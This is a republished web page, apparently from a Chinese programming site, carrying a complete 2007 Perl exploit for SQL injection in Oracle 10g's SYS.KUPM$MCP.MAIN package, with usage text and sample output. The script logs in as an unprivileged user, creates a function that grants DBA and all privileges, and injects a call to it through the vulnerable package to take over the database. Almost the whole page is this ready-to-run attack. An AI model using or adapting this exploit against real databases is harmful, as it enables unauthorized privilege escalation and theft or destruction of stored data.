欢迎来到福编程网,本站提供各种互联网专业知识!
手机版
微信关注
快捷导航
正则表达式 AJAX相关 黑客相关 相关技巧 Mysql MsSql MsSql2005 MsSql2008 MariaDB Oracle Access SQLite PostgreSQL MongoDB DB2 Redis 数据库文摘 数据库其它 LINUX RedHat/Centos Ubuntu/Debian Fedora Solaris 红旗Linux Unix/BSD 苹果MAC 麒麟系统 注册表 BIOS 系统安装 系统进程 Fireworks教程
您的位置:网站首页 > 无法确定分类

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

发布时间:1970-01-01 作者:佚名 来源:互联网
标签: 雪佛兰 通用 奢华 劳斯莱斯 旗舰版 64位 收藏夹 解调器
#!/usr/bin/perl##RemoteOracleKUPM$MCP.MAINexploit(10g)##Grantorrevokedbapermissiontounprivilegeduser##Testedon"OracleDatabase10gEnterpriseEditionRelease10.1.0.3.0"##REF:http://www
#!/usr/bin/perl

#

# Remote Oracle KUPM$MCP.MAIN exploit (10g)

#

# Grant or revoke dba permission to unprivileged user

#

# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"

#

# REF: http://www.red-database-security.com/

#

# AUTHOR: Andrea "bunker" Purificato

# http://rawlab.mindcreations.com

#

# DATE: Copyright 2007 - Tue Mar 27 10:47:14 CEST 2007

#

# Oracle InstantClient (basic sdk) required for DBD::Oracle

#

# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r

# [-] Wait...

# [-] Revoking DBA from BUNKER...

# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmain.pl line 97.

# [-] Done!

#

# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -g

# [-] Wait...

# [-] Creating evil function...

# [-] Go ...(don't worry about errors)!

# DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874

# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "

# BEGIN

# SYS.KUPM$MCP.MAIN(''' AND 0=BUNKER.own--','');

# END;"] at kupm-mcpmain.pl line 119.

# [-] YOU GOT THE POWAH!!

#

# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r

# [-] Wait...

# [-] Revoking DBA from BUNKER...

# [-] Done!

#

use warnings;

use strict;

use DBI;

use Getopt::Std;

use vars qw/ %opt /;

sub usage {

print <<"USAGE";

Syntax: $0 -h -s -u -p -g|-r [-P ]

Options:

-h target server address

-s target sid name

-u user

-p password

-g|-r (g)rant dba to user | (r)evoke dba from user

[-P Oracle port]

USAGE

exit 0

}

my $opt_string = 'h:s:u:p:grP:';

getopts($opt_string, %opt) or &usage;

&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );

&usage if ( !$opt{g} and !$opt{r} );

my $user = uc $opt{u};

my $dbh = undef;

if ($opt{P}) {

$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;

} else {

$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;

}

my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user";

print "[-] Wait...n";

if ($opt{r}) {

print "[-] Revoking DBA from $user...n";

$sqlcmd = "REVOKE DBA FROM $user";

$dbh->do( $sqlcmd );

print "[-] Done!n";

$dbh->disconnect;

exit;

}

print "[-] Creating evil function...n";

$dbh->do( qq{

CREATE OR REPLACE FUNCTION OWN RETURN NUMBER

AUTHID CURRENT_USER AS

PRAGMA AUTONOMOUS_TRANSACTION;

BEGIN

EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;

RETURN(0);

END;

} );

print "[-] Go ...(don't worry about errors)!n";

my $sth = $dbh->prepare( qq{

BEGIN

SYS.KUPM$MCP.MAIN(''' AND 0=$user.own--','');

END;});

$sth->execute;

$sth->finish;

print "[-] YOU GOT THE POWAH!!n";

$dbh->disconnect;

exit;

相关推荐

文章分类

免责声明 联系我们 关于我们 广告合作 电脑相关 手机学院 网络编程 数据库 操作系统 平面设计 网站运营 网络安全

热门关键词

雪佛兰 通用 奢华 劳斯莱斯 旗舰版 64位 收藏夹 解调器 网卡 网线 分辨率 家电 4k 显示器 header USER_AGENT 色彩 图形 商业 生成

热门文章

最新更新

网站首页  | 关于我们  | 免责声明  | 广告合作  | 联系我们
Copyright @ 2015-2024 福编程 fuphp All Rights Reserved.
豫ICP备15036959号-4